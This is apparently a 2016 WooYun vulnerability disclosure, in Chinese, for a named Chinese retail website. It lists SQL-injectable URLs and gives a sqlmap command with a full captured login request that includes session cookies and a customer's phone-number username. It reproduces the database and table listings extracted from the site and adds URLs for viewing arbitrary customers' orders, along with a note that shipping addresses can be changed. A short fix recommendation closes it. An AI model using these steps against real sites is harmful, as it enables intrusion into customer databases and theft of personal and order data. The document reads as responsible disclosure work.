2016-04-14: 积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-29: 厂商已经主动忽略漏洞，细节向公众公开
RT
http://www.haikele.com/yssfclist.aspx?Type=Ahttp://www.haikele.com/yssfclist.aspx?Taste=Ahttp://www.haikele.com/sfcwzlb.aspx?CategoryID=U post注入语法:sqlmap.py -r 3.txt --dbs--------------------post数据包----------------------POST /Login/CustomerLogin.aspx HTTP/1.1Host: www.haikele.comProxy-Connection: keep-aliveContent-Length: 138Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.haikele.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://www.haikele.com/Login/CustomerLogin.aspxAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=wehacuifp1bllptitzriqhg2; LXB_REFER=www.baidu.com; tencentSig=8241218560; HAIKELELOGIN=UserName=13656785601&UserId=214252&AvatarFile=; ProductCookie=sysNos=48013,48013,39196,39196; _gat=1; EntLibCartCookie=cart=00A8BA1CC67CA331; EntLibGiftCookie=gift=00A8BA1CC67CA331; Hm_lvt_bbb3472a2e37b94736cc95fc663ca69f=1460574967; Hm_lpvt_bbb3472a2e37b94736cc95fc663ca69f=1460581837; _ga=GA1.2.1670466567.1460574967__VIEWSTATE=%2FwEPDwUJNDc2NzE5NzM3ZGQ%3D&ctl00%24Body%24txtUid=wooyun&ctl00%24Body%24txtPwd=123123&ctl00%24Body%24btnLogin=%B5%C7+++%C2%BC
数据库信息
available databases [9]:
[*] back
[*] bak20141212
[*] EntLibShopping
[*] master
[*] model
[*] msdb
[*] t
[*] tempdb
[*] TMDB
表信息
Database: EntLibShopping+------------------------------------+---------+| Table | Entries |+------------------------------------+---------+| dbo.INVT_INVT_WBA | 1062297 || dbo.Ent_Sys_Log | 303966 || dbo.zvw_report_traceqtydetail | 219857 || dbo.Ent_Customer_Sequence | 214252 || dbo.PACK_CARD_ORDER_ITEM | 197411 || dbo.PACK_CARD_ORDER_ITEM | 197411 || dbo.zvw_report_posqtydetail | 173719 || dbo.Ent_Hi_Log | 139023 || dbo.zvw_report_orderqtydetail | 128295 || dbo.Ent_SO_Item_Backup | 122000 || dbo.Ent_SO_Item_Backup | 122000 || dbo.vw_report_shortage_detail | 118369 || dbo.ztb_deliverycert_list | 116768 || dbo.vw_report_saleexcept_detail | 103239 || dbo.Ent_SignIn_Hi | 95681 || dbo.Ent_Search_Keywords | 91203 || dbo.PACK_PRODUCT_SUPPLY | 48064 || dbo.Ent_Product_Sequence | 44794 || dbo.Ent_integral_log | 31824 || dbo.Ent_integral_log | 31824 || dbo.PACK_TEMPLATE_PLAN_ITEM | 30876 || dbo.vw_report_lockexcept_detail_v2 | 29744 || dbo.vw_report_lockexcept_detail_v2 | 29744 || dbo.PACK_CARD_ORDER_MASTER | 25670 || dbo.Ent_Comment | 23669 || dbo.Ent_SO_Master_Backup | 22739 || dbo.Ent_SO_Master_Backup | 22739 || dbo.Ent_AccountRecharge | 20320 || dbo.View_Customer_List | 19482 || dbo.Review | 12439 || dbo.View_ztb_deliverycert_detail | 12125 || dbo.Ent_ShipAddress | 10974 || dbo.Ent_Product_Pics | 10064 || dbo.View_Comment_List | 9885 || dbo.Ent_Product_Price | 9403 || dbo.Ent_VendorLog | 8396 || dbo.Ent_Product_TempQuantity | 5961 || dbo.vw_report_zongzi_order_detail | 4126 || dbo.Ent_SO_Master_Repeat | 3533 || dbo.Ent_Inventory_Stock | 3492 || dbo.Ent_Inventory_Stock | 3492 || dbo.Ent_Product_Status | 3381 || dbo.Ent_Area_Sequence | 3364 || dbo.Ent_Area_Sequence | 3364 || dbo.PACK_TEMPLATE_PLAN_MASTER | 3216 || dbo.Ent_Manufacturer_Sequence | 2468 || dbo.Ent_Manufacturer_Sequence | 2468 || dbo.Ent_CMS_Blog | 2340 || dbo.Ent_ShipType_Area_Un | 2269 || dbo.Ent_PhoneUP | 2202 || dbo.Ent_Recharge_log | 2195 || dbo.PACK_CARD_RULE | 1865 || dbo.Ent_SO_Sequence | 1708 || 
dbo.Ent_YiYuanGou | 1646 || dbo.T_District | 949 || dbo.View_ProductList | 828 || dbo.PACK_PRODUCT_CLASS | 614 || dbo.Ent_Sys_Role_Privilege | 605 || dbo.Ent_Sys_Role_Privilege | 605 || dbo.Ent_PO_Item | 524 || dbo.Ent_Sys_Sequence | 473 || dbo.[Ent_CMS_Menu-bad] | 455 || dbo.[Ent_CMS_Menu-bad] | 455 || dbo.Ent_Product_DailyClickTrend | 441 || dbo.Ent_Product_SaleTrend | 437 || dbo.Ent_Promotion_Rule | 435 || dbo.Ent_Product_LastPOInfo | 391 || dbo.vw_report_abortexcept_detail | 387 || dbo.View_AccountRecharge_detail | 352 || dbo.Ent_SO_ValueAdded_Invoice | 337 || dbo.ztb_deliverycert_type | 293 || dbo.Ent_Finance_SOIncome | 265 || dbo.Ent_Sys_User_Role | 235 || dbo.T_City | 195 || dbo.Ent_Sys_Privilege | 175 || dbo.Ent_Category_Sequence | 166 || dbo.Ent_Product_Remark | 159 || dbo.Ent_ProductCategory | 121 || dbo.Ent_Category2 | 120 || dbo.Ent_Sale_PointDelay | 107 || dbo.Ent_Customer_PointLog | 98 || dbo.Ent_Customer_PointLog | 98 || dbo.view_ProductCategory_list | 90 || dbo.view_ProductCategory_list | 90 || dbo.View_ProductCategoryList | 90 || dbo.Ent_AsyncEmail | 86 || dbo.Ent_Category_Customized | 79 || dbo.Ent_PO_Sequence | 75 || dbo.Ent_PO_Master | 74 || dbo.Ent_ShipType_Area_Price | 68 || dbo.Ent_ShipType_Area_Price | 68 || dbo.Seo_head | 61 || dbo.Ent_Category_Attribute | 60 || dbo.Ent_SaleAdvertisementItem | 58 || dbo.Ent_SaleAdvertisementItem | 58 || dbo.Ent_SendPromotion_Log | 56 || dbo.Ent_Product_DailyClick | 52 || dbo.Ent_SearchKeyword | 43 || dbo.PACK_PACK_CLASS | 40 || dbo.PACK_PACK_CLASS | 40 || dbo.Ent_St_Adjust_Item | 30 || dbo.Ent_St_Adjust_Item | 30 || dbo.T_Province | 29 || dbo.ztb_deliverycert_Exchange | 28 || dbo.Ent_SaleRule_Item | 26 || dbo.Ent_Category1 | 25 || dbo.Ent_ShipType_Sequence | 25 || dbo.Ent_St_Adjust_Sequence | 25 || dbo.Ent_TaoBao | 25 || dbo.Ent_PayType_Sequence | 22 || dbo.Ent_PayType_Sequence | 22 || dbo.Ent_Package_Offers | 17 || dbo.Ent_PO_Apportion_Subject | 17 || dbo.Ent_Vendor_Sequence | 16 || dbo.Ent_Vendor_Sequence 
| 16 || dbo.Ent_News | 11 || dbo.Ent_Poll_Item | 11 || dbo.Ent_Poll_Item | 11 || dbo.Ent_SaleRule_Master | 11 || dbo.Ent_St_Virtual | 11 || dbo.Ent_Promotion_Code_Sequence | 10 || dbo.Ent_Promotion_Code_Sequence | 10 || dbo.zvw_deliverystore_list | 10 || dbo.Ent_Stock_Join | 9 || dbo.Ent_Stock_Join | 9 || dbo.Ent_OnlineListArea | 8 || dbo.Ent_OnlineListArea | 8 || dbo.Ent_ShipType_PayType_Un | 8 || dbo.Ent_Sys_User_FavoriteLink | 8 || dbo.Ent_Sys_User_FavoriteLink | 8 || dbo.Ent_Finance_POPay_Item | 7 || dbo.Ent_Finance_POPay_Item | 7 || dbo.Ent_St_Transfer_Item | 7 || dbo.Ent_St_Transfer_Item | 7 || dbo.Ent_Supplie | 7 || dbo.Ent_Product_Question | 6 || dbo.Ent_St_Transfer_Sequence | 5 || dbo.Ent_WishList | 5 || dbo.Ent_Cs_log | 4 || dbo.Ent_Cs_log | 4 || dbo.Ent_PO_Basket | 4 || dbo.Ent_Product_Related | 4 || dbo.Ent_Product_Sale | 4 || dbo.Ent_Sys_Sync | 4 || dbo.T_Type | 4 || dbo.ztb_deliverycert_status | 4 || dbo.Ent_Product_Notify | 3 || dbo.Ent_RMA_OutBound_Item | 3 || dbo.Ent_RMA_OutBound_Item | 3 || dbo.Ent_RMA_Register_Sequence | 3 || dbo.Ent_RMA_Register_Sequence | 3 || dbo.Ent_RMA_Request_Item | 3 || dbo.Ent_RMA_Request_Item | 3 || dbo.Ent_RMA_Request_Sequence | 3 || dbo.Ent_Feedback | 2 || dbo.Ent_Finance_NetPay | 2 || dbo.Ent_RMA_OutBound_Sequence | 2 || dbo.Ent_RMA_Revert_Item | 2 || dbo.Ent_RMA_Revert_Item | 2 || dbo.Ent_RMA_Revert_Sequence | 2 || dbo.Ent_Settings | 2 || dbo.Ent_St_Lend_Item | 2 || dbo.Ent_St_Lend_Item | 2 || dbo.Ent_St_Lend_Return | 2 || dbo.Ent_Sys_Configuration | 2 || dbo.UserPointLevel | 2 || dbo.Ent_FriendLink | 1 || dbo.Ent_LinkSource_ReportColumn | 1 || dbo.Ent_LinkSource_ReportColumn | 1 || dbo.Ent_Promotion_Customer | 1 || dbo.Ent_Promotion_Limit | 1 || dbo.Ent_Promotion_Master_Sequence | 1 || dbo.Ent_Promotion_Master_Sequence | 1 || dbo.Ent_Recommend | 1 || dbo.Ent_RMA_Refund_Item | 1 || dbo.Ent_RMA_Refund_Item | 1 || dbo.Ent_RMA_Refund_Sequence | 1 || dbo.Ent_RMA_Return_Item | 1 || dbo.Ent_RMA_Return_Item | 1 || 
dbo.Ent_RMA_Return_Sequence | 1 || dbo.Ent_Sale_CountDown | 1 || dbo.Ent_Sale_CountGift | 1 || dbo.Ent_St_Lend_Sequence | 1 || dbo.Ent_St_Shift_Item | 1 || dbo.Ent_St_Shift_Item | 1 || dbo.Ent_St_Shift_Sequence | 1 || dbo.PACK_CARD_SEASON | 1 |+------------------------------------+---------+
下面这个库有 800 多个表，仅贴出部分信息
Database: TMDB[807 tables]+---------------------------------------------+| ACTIONSERIES || AP_PAYMENT_APPLY || ARHASTENENTERTAIN || AR_AR_GA_tmp || AR_AR_GA_tmp || AR_AR_WBA_tmp || AR_AR_WBA_tmp || AR_FAR_GA || AR_FAR_WBA || AR_RACCT_GA || AR_RACCT_WBA || AR_yingshou_v || AccountsPopedom || Aux_IMEICODE || BATCH_FORM_BD || BATCH_FORM_HD || BBS1 || BILLCONTENTCONFIGURE || BILLCONTENTRECORD || BILLCONTENTTABLE || BILLCONTENTTABLEST || BOXST || BOXUPHEAD || BOXUPST || BPMCONTENT || BPMFLOW || BPMMAIN || BSC_EVAL_BD || BSC_EVAL_HD || BSC_INI || BranchPost || CAIGOU1 || CB_ACTIONATTRIBUTE || CB_ACTIONBUSINESS || CB_ACTIONSERIES2 || CB_ACTIONSERIES2 || CB_ACTIONSERIESDOING || CB_ACTIONSERIESLAST || CB_ACTIONSERIESLOG || CB_BILLCONFIGUREBD || CB_BILLCONFIGUREHD || CB_COMTB || CB_PLANTB || CB_SERVICECHECK || CB_zBak_20100326_161840_201004_AR_AR_GA || CB_zBak_20100326_161840_201004_Invt_Invt_GA || COMPREVDATE || COMTB || CX_RYKC || C_ACCOUNTSPOPEDOM || C_ACCOUNTS_PERMISSIONS || C_ACCOUNTS_ROLEPERMISSIONS || C_AUDITCFG || C_BDTOHD || C_BFACCTCFG || C_BILLRULESERIES || C_BUTTONCFG || C_CHOOSEBILL || C_COMBOCFG || C_COMBOUION || C_COMMONCXFORM || C_COMMONCXFORM || C_COMMONPRINTCLICK || C_COMMONPRINTCLICK || C_COMMONPRINTFSET || C_COMMONPRINTFSETUSER || C_COMMONPRINTMULTITEMPLATE || C_COMMONPRINTSET || C_COMMONPRINTSET || C_COMMONRS |
这边越权查看任意订单信息
http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34996
http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34995
还有一处是收货信息可被任意修改，修改处抓包如下
这个
之前177这个号
修改包
成功添加一个
修复建议：对输入参数做过滤（使用参数化查询），并对订单、收货信息的访问增加权限校验。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)